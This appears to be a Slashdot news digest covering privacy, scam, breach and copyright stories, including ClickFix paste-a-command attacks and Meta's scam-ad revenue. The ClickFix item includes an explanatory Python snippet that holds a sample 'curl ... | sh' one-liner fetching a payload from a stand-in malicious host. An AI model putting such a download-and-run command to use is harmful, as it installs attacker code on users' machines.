Google

Google Is Collecting Troves of Data From Downgraded Nest Thermostats 11

Even after disabling remote control and officially ending support for early Nest Learning Thermostats, Google is still receiving detailed sensor and activity data from these devices, including temperature changes, motion, and ambient light. The Verge reports: After digging into the backend, security researcher Cody Kociemba found that the first- and second-generation Nest Learning Thermostats are still sending Google information about manual temperature changes, whether a person is present in the room, if sunlight is hitting the device, and more. Kociemba made the discovery while participating in a bounty program created by FULU, a right-to-repair advocacy organization cofounded by electronics repair technician and YouTuber Louis Rossmann.

FULU challenged developers to come up with a solution to restore smart functionality to Nest devices no longer supported by Google, and that's exactly what Kociemba did with his open-source No Longer Evil project. But after cloning Google's API to create this custom software, he started receiving a trove of logs from customer devices, a flow of data he then shut off. "On these devices, while they [Google] turned off access to remotely control them, they did leave in the ability for the devices to upload logs. And the logs are pretty extensive," Kociemba tells The Verge. [...] "I was under the impression that the Google connection would be severed along with the remote functionality, however that connection is not severed, and instead is a one-way street," Kociemba says.
The Courts

NetChoice Sues Virginia To Block Its One-Hour Social Media Limit For Kids (theverge.com) 30

NetChoice is suing Virginia to block a new law that limits kids under 16 to one hour of daily social media use unless parents approve more time, arguing the rule violates the First Amendment and introduces serious privacy risks through mandatory age-verification. The Verge reports: In addition to restricting access to legal speech, NetChoice alleges that Virginia's incoming law (SB 854) will require platforms to verify user ages in ways that would pose privacy and security risks. The law requires platforms to use "commercially reasonable methods," which it says include a screen that prompts the user to enter a birth date. However, NetChoice argues that Virginia could go beyond this requirement, citing a post from Governor Youngkin on X, stating "platforms must verify age," potentially referring to stricter methods, like having users submit a government ID or other personal information.

NetChoice, which is backed by tech giants like Meta, Google, Amazon, Reddit, and Discord, alleges that the law puts a burden on minors' ability to engage with or consume speech online. "The First Amendment prohibits the government from placing these types of restrictions on accessing lawful and valuable speech, just in the same way that the government can't tell you how long you could spend reading a book, watching a television program, or consuming a documentary," Paul Taske, the co-director of the NetChoice Litigation Center, tells The Verge.

"Virginia must leave the parenting decisions where they belong: with parents," Taske says. "By asserting that authority for itself, Virginia not only violates its citizens' rights to free speech but also exposes them to increased risk of privacy and security breaches."

Crime

Google Begins Aggressively Using the Law To Stop Text Message Scams (bgr.com) 18

"Google is going to court to help put an end to, or at least limit, the prevalence of phishing scams over text message," reports BGR: Google said it's bringing suit against Lighthouse, an impressively large operation that allegedly provides tools customers can buy to set up their own specialized phishing scams. All told, Google estimates that Lighthouse-affiliated scams in the U.S. have stolen anywhere between 12.7 million and 115 million credit cards. "Bad actors built Lighthouse as a phishing-as-a-service kit to generate and deploy massive SMS phishing attacks," Google notes. "These attacks exploit established brands like E-Z Pass to steal people's financial information."

Google's legal action is comprehensive and is intent on completely dismantling Lighthouse's operations. The search giant is bringing claims under RICO, the Lanham Act, and the Computer Fraud and Abuse Act (CFAA). RICO, which often comes up in movies and television shows, allows authorities to treat Lighthouse's phishing operation as a broad criminal enterprise as opposed to isolated scams. By using RICO, Google also expands the list of individuals who can be found liable, whether it be the people who started Lighthouse, the people who run it, or even unaffiliated customers who used the company's services. The Lanham Act, for those unaware, targets malicious actors who misappropriate well-known company trademarks in order to confuse consumers. The Lanham Act comes into play because many phishing scams masquerade as legitimate messages from companies like Amazon and FedEx. The Computer Fraud and Abuse Act, meanwhile, is relevant because scammers typically use stolen credentials to gain unauthorized access to financial systems, something the CFAA is designed to target...

The fact that Google is invoking all three of the acts above underscores how serious the company is about putting a stop to SMS-based scams. By using all three, Google's legal attack is more potent and also expands the range of available remedies to include civil damages and criminal penalties. In short, Google isn't merely trying to win a legal case; it's aiming to emphatically and permanently stop Lighthouse in its tracks.

Getting even more aggressive, Google says it's also working with the U.S. Congress to pass new anti-scammer legislation, and endorsed these three new bipartisan bills:
  • The Scam Compound Accountability and Mobilization (SCAM) Act "would develop a national strategy to counter scam compounds, enhance sanctions and support survivors of human trafficking within these compounds."
  • The Foreign Robocall Elimination Act "would establish a taskforce focused on how to best block foreign-originated illegal robocalls before they ever reach American consumers."
  • The Guarding Unprotected Aging Retirees from Deception (GUARD) Act "would empower state and local law enforcement by enabling them to utilize federal grant funding to investigate financial fraud and scams specifically targeting retirees."

Thanks to Slashdot reader anderzole for sharing the article.


ISS

Woman Pleads Guilty to Lying About Astronaut Accessing Bank Account From International Space Station (cnbc.com) 34

It was the first allegation of a crime committed in space — back in 2019. But by 2020 it had led to charges of lying to federal authorities. And now a former Air Force intelligence officer "has pleaded guilty to lying to a federal agent," reports CNBC, "by falsely claiming that her estranged astronaut wife illegally accessed her bank account while aboard the International Space Station for six months, prosecutors in Houston, Texas, said Friday." The guilty plea by Summer Worden, 50, on Thursday comes more than five years after she was indicted in the space case for lying about actions by her wife, Anne McClain, a U.S. Army colonel, West Point graduate and Iraq war combat veteran, while they were in the midst of a divorce. The claim came at a time when the couple was engaged in a custody battle over Worden's then-6-year-old son, who had been conceived through in vitro fertilization and carried by a surrogate...

McClain was aboard the Space Station from December 2018 through June 2019. More recently, she commanded the SpaceX Crew-10 mission to the Space Station from March until August of this year.

Worden, who remains free on bond, is scheduled to be sentenced on February 12. She faces a maximum possible sentence of up to five years in prison.

Crime

Five People Plead Guilty To Helping North Koreans Infiltrate US Companies (techcrunch.com) 31

"Within the past year, stories have been posted on Slashdot about people helping North Koreans get remote IT jobs at U.S. corporations, companies knowingly assisting them, how not to hire a North Korean for a remote IT job, and how a simple question tripped up a North Korean applying for a remote IT job," writes longtime Slashdot reader smooth wombat. "The FBI is even warning companies that North Koreans working remotely can steal source code and extort money from the company -- money that goes to fund the North Korean government. Now, five more people have pleaded guilty to knowingly helping North Koreans infiltrate U.S. companies as remote IT workers." TechCrunch reports: The five people are accused of working as "facilitators" who helped North Koreans get jobs by providing their own real identities, or false and stolen identities of more than a dozen U.S. nationals. The facilitators also hosted company-provided laptops in their homes across the U.S. to make it look like the North Korean workers lived locally, according to the DOJ press release. These actions affected 136 U.S. companies and netted Kim Jong Un's regime $2.2 million in revenue, said the DOJ. Three of the people -- U.S. nationals Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis -- each pleaded guilty to one count of wire fraud conspiracy.

Prosecutors accused the three of letting North Koreans who posed as legitimate IT workers, and whom they knew worked outside of the United States, use their identities to obtain employment; the three also helped the workers remotely access company-issued laptops set up in their homes and pass vetting procedures, such as drug tests. The fourth U.S. national who pleaded guilty is Erick Ntekereze Prince, who ran a company called Taggcar that supplied U.S. companies with allegedly "certified" IT workers whom he knew worked outside of the country and were using stolen or fake identities. Prince also hosted laptops with remote access software at several residences in Florida and earned more than $89,000 for his work, the DOJ said.

Another participant in the scheme who pleaded guilty to one count of wire fraud conspiracy and another count of aggravated identity theft is Ukrainian national Oleksandr Didenko, who prosecutors accuse of stealing U.S. citizens' identities and selling them to North Koreans so they could get jobs at more than 40 U.S. companies. According to the press release, Didenko earned hundreds of thousands of dollars for this service. Didenko agreed to forfeit $1.4 million as part of his guilty plea. The DOJ also announced that it had frozen and seized more than $15 million in cryptocurrency stolen in 2023 by North Korean hackers from several crypto platforms.

Privacy

Logitech Reports Data Breach From Zero-Day Software Vulnerability (nerds.xyz) 5

BrianFagioli writes: Logitech has confirmed a cybersecurity breach after an intruder exploited a zero-day in a third-party software platform and copied internal data. The company says the incident did not affect its products, manufacturing or business operations, and it does not believe sensitive personal information like national ID numbers or credit card data was stored in the impacted system. The attacker still managed to pull limited information tied to employees, consumers, customers and suppliers, raising fair questions about how long the zero-day existed before being patched.

Logitech brought in outside cybersecurity firms, notified regulators and says the incident will not materially affect its financial results. The company expects its cybersecurity insurance policy to cover investigation costs and any potential legal or regulatory issues. Still, with zero-day attacks increasing across the tech world, even established hardware brands are being forced to acknowledge uncomfortable weaknesses in their internal systems.

Government

Singapore To Trial Tokenized Bills, Bring In Stablecoin Laws (reuters.com) 4

An anonymous reader quotes a report from Reuters: Singapore's central bank will hold trials to issue tokenized MAS bills next year and bring in laws to regulate stablecoins as it presses forward with plans to build a scalable and secure tokenized financial ecosystem, the bank's top official said on Thursday. "Tokenization has lifted off the ground. But have asset-backed tokens achieved escape velocity? Not yet," said Chia Der Jiun, Managing Director of the Monetary Authority of Singapore (MAS), in a keynote address at the Singapore FinTech Festival.

He said MAS has been working on the details of its stablecoin regulatory regime and will prepare draft legislation, with the emphasis on "sound reserve backing and redemption reliability." MAS is also supporting trials under the BLOOM initiative, which explores the use of tokenized bank liabilities and regulated stablecoins for settlement, he added. "In the CBDC space, I am pleased to announce that the three Singapore banks, DBS, OCBC, and UOB, have successfully conducted interbank overnight lending transactions using the first live trial issuance of Singapore dollar wholesale CBDC," he said. MAS will expand trials to include tokenized MAS bills settled with CBDC, he added.

Privacy

Hyundai Data Breach May Have Leaked Drivers' Personal Information (caranddriver.com) 54

According to Car and Driver, Hyundai has suffered a data breach that leaked the personal data of up to 2.7 million customers. The leak reportedly took place in February from Hyundai AutoEver, the company's IT affiliate. It includes customer names, driver's license numbers, and social security numbers. Longtime Slashdot reader sinij writes: Thanks to tracking modules plaguing most modern cars, that data likely includes the times and locations of customers' vehicles. These repeated breaches make it clear that, unlike smartphone manufacturers that are inherently tech companies, car manufacturers collecting your data are going to keep getting breached and leaking it.
Privacy

Proton Might Recycle Abandoned Email Addresses (nerds.xyz) 30

BrianFagioli writes: Popular privacy firm Proton is floating a plan on Reddit that should unsettle anyone who values privacy, writes Nerds.xyz. The company is considering recycling abandoned email addresses that were originally created by bots a decade ago. These addresses were never used, yet many of them are extremely common names that have silently collected misdirected emails, password reset attempts, and even entries in breach datasets. Handing those addresses to new owners today would mean that sensitive messages intended for completely different people could start landing in a stranger's inbox overnight.

Proton says it's just gathering feedback, but the fact that this made it far enough to ask the community is troubling. Releasing these long-abandoned addresses would create confusion, risk exposure of personal data, and undermine the trust users place in a privacy-focused provider. It's hard to see how Proton could justify taking a gamble with other people's digital identities like this.

The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Piracy

Amazon Steps Up Attempts To Block Illegal Sports Streaming Via Fire TV Sticks (nytimes.com) 27

Amazon is rolling out a tougher approach to combat illegal streaming, with the United States-based tech company aiming to block apps loaded onto all its Fire TV Stick devices that are identified as providing pirated content. From a report: Exclusive data provided to The Athletic by researchers YouGov Sport highlighted that approximately 4.7 million UK adults watched illegal streams in the UK over the past six months, with 31% using Fire Stick (this has become a catch-all term for plug-in devices, even if not made by Amazon) and other IPTV (Internet Protocol Television) devices. It is now the second-most popular method behind websites (42%).

Amazon launched a new Fire TV Stick last month -- the 4K Select, which is plugged into a TV to facilitate streaming via the internet -- that it insists will be less of a breeding ground for piracy. It comprises enhanced security measures -- via a new Vega operating system -- and restricts customers to downloading only apps available in Amazon's app store. Amazon insists the clampdown will apply to the new and old devices, but registered developers will still be able to use Fire Sticks for legitimate purposes.

Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel where the target has a pending registration, referencing the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
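The base64 obfuscation described above is simple to demonstrate. Below is a minimal sketch; the one-liner command and the URL in it are hypothetical, invented for illustration rather than taken from any real campaign. It shows why an encoded command defeats casual inspection while remaining trivially reversible for the shell that runs it:

```python
import base64

# Hypothetical ClickFix-style one-liner; the command and URL are
# illustrative only, not from a real campaign.
plain = "curl -fsSL https://malicious.example/payload.sh | sh"

# Encoding renders the command opaque to a casual human reader...
encoded = base64.b64encode(plain.encode()).decode()
print(encoded)

# ...but any shell or script can reverse it with a single call.
decoded = base64.b64decode(encoded).decode()
assert decoded == plain
```

The same property cuts both ways: security tooling that decodes base64 blobs found on the clipboard before they reach a terminal can flag ones that expand into download-and-run pipelines.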
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executable. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
The Courts

OpenAI Used Song Lyrics In Violation of Copyright Laws, German Court Says (reuters.com) 66

A Munich court ruled that OpenAI violated German copyright law by training its models on lyrics from nine songs and allowing ChatGPT to reproduce them. OpenAI now faces damages as it considers an appeal. Reuters reports: The regional court in Munich found that the company trained its AI on protected content from nine German songs, including Grönemeyer's hits "Männer" and "Bochum." The case was brought by German music rights society GEMA, whose members include composers, lyricists and publishers, in another sign of artists around the world fighting back against data scraping by AI.

Presiding judge Elke Schwager ordered OpenAI to pay damages for the use of copyrighted material, without disclosing a figure. GEMA legal advisor Kai Welp said GEMA hoped discussions could now take place with OpenAI on how copyright holders can be remunerated. OpenAI had argued that its language models did not store or copy specific training data but, rather, reflected what they had learned based on the entire training data set.

Since the output would only be generated as a result of user inputs known as prompts, it was not the defendants, but the respective user who would be liable for it, OpenAI had argued. However, the court found that both the memorization in the language models and the reproduction of the song lyrics in the chatbot's outputs constitute infringements of copyright exploitation rights, according to a statement on the ruling.

United States

US Senator Challenges Defense Industry on Right-to-Repair Opposition (reuters.com) 47

Democratic U.S. Senator Elizabeth Warren is escalating pressure on the defense industry to stop opposing military right-to-repair legislation, as House and Senate negotiators work to finalize the fiscal 2026 National Defense Authorization Act. From a report: In a sharply-worded November 5 letter to the National Defense Industrial Association (NDIA) obtained by Reuters, Warren accused the industry group of attempting to undermine bipartisan efforts to give the Pentagon greater ability to repair weapons and equipment it owns.

She called the group's opposition "a dangerous and misguided attempt to protect an unacceptable status quo of giant contractor profiteering." Currently, the government is often required to pay contractors like NDIA members Lockheed Martin, Boeing and RTX to use expensive original equipment and installers to service broken parts, versus having trained military maintainers 3D print spares in the field and install them faster and more cheaply.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU antitrust chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
AI

'AI Slop' in Court Filings: Lawyers Keep Citing Fake AI-Hallucinated Cases (indianexpress.com) 135

"According to court filings and interviews with lawyers and scholars, the legal profession in recent months has increasingly become a hotbed for AI blunders," reports the New York Times: Earlier this year, a lawyer filed a motion in a Texas bankruptcy court that cited a 1985 case called Brasher v. Stewart. Only the case doesn't exist. Artificial intelligence had concocted that citation, along with 31 others. A judge blasted the lawyer in an opinion, referring him to the state bar's disciplinary committee and mandating six hours of A.I. training.

That filing was spotted by Robert Freund, a Los Angeles-based lawyer, who fed it to an online database that tracks legal A.I. misuse globally. Mr. Freund is part of a growing network of lawyers who track down A.I. abuses committed by their peers, collecting the most egregious examples and posting them online. The group hopes that by tracking down the A.I. slop, it can help draw attention to the problem and put an end to it... [C]ourts are starting to map out punishments of small fines and other discipline. The problem, though, keeps getting worse. That's why Damien Charlotin, a lawyer and researcher in France, started an online database in April to track it.

Initially he found three or four examples a month. Now he often receives that many in a day. Many lawyers... have helped him document 509 cases so far. They use legal tools like LexisNexis for notifications on keywords like "artificial intelligence," "fabricated cases" and "nonexistent cases." Some of the filings include fake quotes from real cases, or cite real cases that are irrelevant to their arguments. The legal vigilantes uncover them by finding judges' opinions scolding lawyers...

Court-ordered penalties "are not having a deterrent effect," said Freund, who has publicly flagged more than four dozen examples this year. "The proof is that it continues to happen."

Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters, Google Search Console.

Though it normally shows the short phrases or keywords typed into Google which led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries — including "some pretty crazy ones." (Web optimization consultant Slobodan Manić helped Packer investigate...) Packer points out that "nobody clicked share" and that users were never given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.
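Site owners curious whether their own Search Console data caught any of these chats can look for the telltale sign the researchers describe: queries far longer than normal search keywords. A minimal sketch, assuming a plain list of query strings such as a GSC performance-report export provides; the sample queries and the 100-character threshold are illustrative choices, not values from the report:

```python
def chatbot_like_queries(queries, min_len=100):
    """Flag queries long enough to look like pasted chatbot prompts;
    ordinary search keywords rarely approach 100 characters."""
    return [q for q in queries if len(q) >= min_len]

# Illustrative sample: one normal keyword query, one conversational prompt.
sample = [
    "best running shoes 2025",
    "please help me decide whether i should tell my business partner that "
    "i want to dissolve our company before the end of the fiscal year",
]
flagged = chatbot_like_queries(sample)
print(flagged)  # only the long, conversational query is flagged
```

A length filter like this will not catch short leaked prompts, but it cheaply surfaces the 300-character outliers the researchers first noticed.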

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console."
Facebook

Bombshell Report Exposes How Meta Relied On Scam Ad Profits To Fund AI (reuters.com) 59

"Internal documents have revealed that Meta has projected it earns billions from ignoring scam ads that its platforms then targeted to users most likely to click on them," writes Ars Technica, citing a lengthy report from Reuters.

Reuters reports that Meta "for at least three years failed to identify and stop an avalanche of ads that exposed Facebook, Instagram and WhatsApp's billions of users to fraudulent e-commerce and investment schemes, illegal online casinos, and the sale of banned medical products..." On average, one December 2024 document notes, the company shows its platforms' users an estimated 15 billion "higher risk" scam advertisements — those that show clear signs of being fraudulent — every day. Meta earns about $7 billion in annualized revenue from this category of scam ads, another late 2024 document states. Much of the fraud came from marketers acting suspiciously enough to be flagged by Meta's internal warning systems.

But the company only bans advertisers if its automated systems predict the marketers are at least 95% certain to be committing fraud, the documents show. If the company is less certain — but still believes the advertiser is a likely scammer — Meta charges higher ad rates as a penalty, according to the documents. The idea is to dissuade suspect advertisers from placing ads. The documents further note that users who click on scam ads are likely to see more of them because of Meta's ad-personalization system, which tries to deliver ads based on a user's interests... The documents indicate that Meta's own research suggests its products have become a pillar of the global fraud economy. A May 2025 presentation by its safety staff estimated that the company's platforms were involved in a third of all successful scams in the U.S.
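The tiered enforcement the documents describe — ban only at very high predicted certainty, otherwise charge penalty rates to a "likely scammer" — can be sketched as a simple decision rule. This is a hypothetical illustration of the policy as reported, not Meta's code; the 50% "likely scammer" cutoff and the penalty multiplier are invented, since the report specifies only the 95% ban threshold.

```python
# Hypothetical sketch of the tiered ad-enforcement rule described in the
# Reuters report. Only the 95% ban threshold comes from the documents;
# LIKELY_SCAMMER_THRESHOLD and penalty_multiplier are assumptions.

BAN_THRESHOLD = 0.95            # reported: ban only at >= 95% predicted fraud
LIKELY_SCAMMER_THRESHOLD = 0.5  # assumed cutoff for "likely scammer"

def enforcement_action(fraud_probability: float, base_ad_rate: float,
                       penalty_multiplier: float = 2.0) -> tuple[str, float]:
    """Return (action, effective ad rate) for an advertiser."""
    if fraud_probability >= BAN_THRESHOLD:
        return ("ban", 0.0)  # advertiser blocked from the platform
    if fraud_probability >= LIKELY_SCAMMER_THRESHOLD:
        # Reported policy: charge higher rates to dissuade suspect advertisers
        return ("penalty_rate", base_ad_rate * penalty_multiplier)
    return ("allow", base_ad_rate)
```

The notable property of such a rule is that advertisers in the middle band are not removed but remain paying customers at a premium, which is precisely the incentive structure the documents describe.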

Meta also acknowledged in other internal documents that some of its main competitors were doing a better job at weeding out fraud on their platforms... The documents note that Meta plans to try to cut the share of Facebook and Instagram revenue derived from scam ads. In the meantime, Meta has internally acknowledged that regulatory fines for scam ads are certain, and anticipates penalties of up to $1 billion, according to one internal document. But those fines would be much smaller than Meta's revenue from scam ads, a separate document from November 2024 states. Every six months, Meta earns $3.5 billion from just the portion of scam ads that "present higher legal risk," the document says, such as those falsely claiming to represent a consumer brand or public figure or demonstrating other signs of deceit. That figure almost certainly exceeds "the cost of any regulatory settlement involving scam ads...."

A planning document for the first half of 2023 notes that everyone who worked on the team handling advertiser concerns about brand-rights issues had been laid off. The company was also devoting resources so heavily to virtual reality and AI that safety staffers were ordered to restrict their use of Meta's computing resources. They were instructed merely to "keep the lights on...." Meta also was ignoring the vast majority of user reports of scams, a document from 2023 indicates. By that year, safety staffers estimated that Facebook and Instagram users each week were filing about 100,000 valid reports of fraudsters messaging them, the document says. But Meta ignored or incorrectly rejected 96% of them. Meta's safety staff resolved to do better. In the future, the company hoped to dismiss no more than 75% of valid scam reports, according to another 2023 document.

A small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it, a 2024 document states. Some bigger spenders — known as "High Value Accounts" — could accrue more than 500 strikes without Meta shutting them down, other documents say.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.
